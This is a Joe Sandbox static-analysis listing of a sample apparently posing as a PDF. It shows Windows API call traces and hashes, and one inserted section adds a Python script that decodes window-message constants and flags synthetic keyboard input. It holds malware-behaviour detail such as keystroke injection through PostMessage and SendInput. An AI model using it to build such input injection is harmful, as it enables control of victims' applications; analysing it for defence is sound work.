                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                              • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                              APIs
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$MessageMoveSend
                              • String ID:
                              • API String ID: 896007046-0
                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                              • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                              APIs
                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                              • GetFocus.USER32 ref: 00448ACF
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$FocusMessageSend
                              • String ID:
                              • API String ID: 3429747543-0
                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                              • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                              • __swprintf.LIBCMT ref: 0045D4E9
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$InformationVolume__swprintf
                              • String ID: %lu$\VH
                              • API String ID: 3164766367-2432546070
                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                              • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                              APIs
                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                              Strings
                              Similarity
                              • API ID: MessageSend
                              • String ID: Msctls_Progress32
                              • API String ID: 3850602802-3636473452
                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                              • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                              APIs
                              Similarity
                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                              • String ID:
                              • API String ID: 3985565216-0
                              • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                              • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                              • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                              • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                              APIs
                              • _malloc.LIBCMT ref: 0041F707
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _free.LIBCMT ref: 0041F71A
                              Strings
                              Similarity
                              • API ID: AllocateHeap_free_malloc
                              • String ID: [B
                              • API String ID: 1020059152-632041663
                              • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                              • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                              • __calloc_crt.LIBCMT ref: 00413DB0
                              • __getptd.LIBCMT ref: 00413DBD
                              • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                              • _free.LIBCMT ref: 00413E07
                              • __dosmaperr.LIBCMT ref: 00413E12
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 155776804-0
                              • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                              • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                              APIs
                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                              Similarity
                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                              • String ID:
                              • API String ID: 1957940570-0
                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                              • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 259663610-0
                              • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                              • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004302E6
                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                              • GetClientRect.USER32(?,?), ref: 00430364
                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                              • GetWindowRect.USER32(?,?), ref: 004303C3
                              • ScreenToClient.USER32(?,?), ref: 004303EC
                              Similarity
                              • API ID: Rect$Client$Window$MetricsScreenSystem
                              • String ID:
                              • API String ID: 3220332590-0
                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                              • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                              APIs
                              Similarity
                              • API ID: _malloc_wcslen$_strcat_wcscpy
                              • String ID:
                              • API String ID: 1612042205-0
                              • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                              • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                              • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                              • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                              APIs
                              Strings
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: >$U$\
                              • API String ID: 2666721431-237099441
                              • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                              • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C570
                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                              Similarity
                              • API ID: MessagePost$KeyboardState$InputSend
                              • String ID:
                              • API String ID: 2221674350-0
                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
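Decoding the two message-passing traces on this page, as an added example that is not part of the Joe Sandbox report or of the analysed sample: the script below parses the bullet lines of an APIs block into records, names the message IDs using constants from the Win32 SDK (the PBM_* names assume the target window is a progress bar, which the report's Msctls_Progress32 string in that function supports), and tags a function whose posted WM_KEYDOWN / WM_SYSKEYDOWN / WM_CHAR messages are paired with SendInput or SetKeyboardState as producing keystrokes the user never typed. The sample traces are copied from the listing above; the regex, the tag names and the helper functions are this example's own.

```python
"""Added example, not from the Joe Sandbox report: decode the window-message
constants in the SendMessageW/PostMessageW traces of this listing.
Sample traces are copied from the page; constants are from WinUser.h/CommCtrl.h."""
import re
from collections import namedtuple
from typing import Optional

# args: raw hex tokens as printed by the report, "?" where the value is unknown
ApiCall = namedtuple("ApiCall", "api module args ref")

# Matches e.g. "SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7"
CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

WM_USER = 0x0400
CCM_FIRST = 0x2000
CLR_DEFAULT = 0xFF000000  # "use the default colour" in a COLORREF argument

# Names for the message IDs seen in the traces.  PBM_* names only apply when
# the target is a progress bar (SendInput's cbSize 0x1C in the second trace is
# sizeof(INPUT) on 32-bit Windows).
MESSAGES = {
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN",
    0x0105: "WM_SYSKEYUP",
    WM_USER + 1: "PBM_SETRANGE",      # lParam = MAKELPARAM(min, max)
    WM_USER + 2: "PBM_SETPOS",
    WM_USER + 4: "PBM_SETSTEP",
    WM_USER + 9: "PBM_SETBARCOLOR",
    CCM_FIRST + 1: "PBM_SETBKCOLOR",  # same value as CCM_SETBKCOLOR
}

# Sample input, copied from two function entries on this page.
PROGRESS_TRACE = """
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
"""
KEYBOARD_TRACE = """
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
"""


def parse_calls(text: str) -> list:
    """Turn the bullet lines of an 'APIs' block into ApiCall records."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls


def parse_arg(token: str) -> Optional[int]:
    """Hex token -> int; '?' (value unknown to the analyser) -> None."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def decode_message(call: ApiCall):
    """For SendMessageW/PostMessageW return (message name, wParam, lParam), else None."""
    if call.api not in ("SendMessageW", "PostMessageW") or len(call.args) < 4:
        return None
    msg, wparam, lparam = (parse_arg(a) for a in call.args[1:4])
    name = "?" if msg is None else MESSAGES.get(msg, f"0x{msg:04X}")
    return name, wparam, lparam


def describe_call(call: ApiCall) -> str:
    """One readable line per trace entry."""
    dec = decode_message(call)
    if dec is None:
        return f"{call.api}({', '.join(call.args)})"
    name, wparam, lparam = dec
    if name == "PBM_SETRANGE" and lparam is not None:
        return f"{name} min={lparam & 0xFFFF} max={lparam >> 16}"
    if name.endswith("COLOR") and lparam == CLR_DEFAULT:
        return f"{name} CLR_DEFAULT"
    fmt = lambda v: "?" if v is None else f"0x{v:X}"
    return f"{name} wParam={fmt(wparam)} lParam={fmt(lparam)}"


def describe_trace(text: str) -> list:
    return [describe_call(c) for c in parse_calls(text)]


def classify(calls: list) -> list:
    """Tag a function by the behaviour its decoded calls show (tag names are this example's)."""
    apis = {c.api for c in calls}
    names = {d[0] for d in map(decode_message, calls) if d}
    tags = []
    key_msgs = {"WM_KEYDOWN", "WM_KEYUP", "WM_CHAR", "WM_SYSKEYDOWN", "WM_SYSKEYUP"}
    # Posting key messages plus SendInput/SetKeyboardState: keystrokes not typed by the user
    if names & key_msgs and apis & {"SendInput", "SetKeyboardState"}:
        tags.append("synthetic-keyboard-input")
    if names & {"PBM_SETRANGE", "PBM_SETPOS", "PBM_SETSTEP"}:
        tags.append("progress-bar-control")
    return tags
```

Reading the output: the first trace configures a progress bar with range 0..100, step 1 and default colours, ordinary GUI behaviour; the second posts key-down, system-key-down and character messages to a window handle and then calls SendInput, which is how a program types into another application. That is the trace to follow up in the dynamic data: which window receives the messages and whether it belongs to a different process.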
                              APIs
                              Similarity
                              • API ID: _wcscpy$_wcscat
                              • String ID:
                              • API String ID: 2037614760-0
                              • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                              • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                              APIs
                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                              Similarity
                              • API ID: Variant$Copy$AllocClearErrorLastString
                              • String ID:
                              • API String ID: 960795272-0
                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                              APIs
                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Similarity
                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 4189319755-0
                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                              APIs
                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend$LongWindow$InvalidateRect
                              • String ID:
                              • API String ID: 1976402638-0
                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                              APIs
                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Show$Enable$MessageSend
                              • String ID:
                              • API String ID: 642888154-0
                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                              APIs
                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Window$Enable$Show$MessageSend
                              • String ID:
                              • API String ID: 1871949834-0
                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
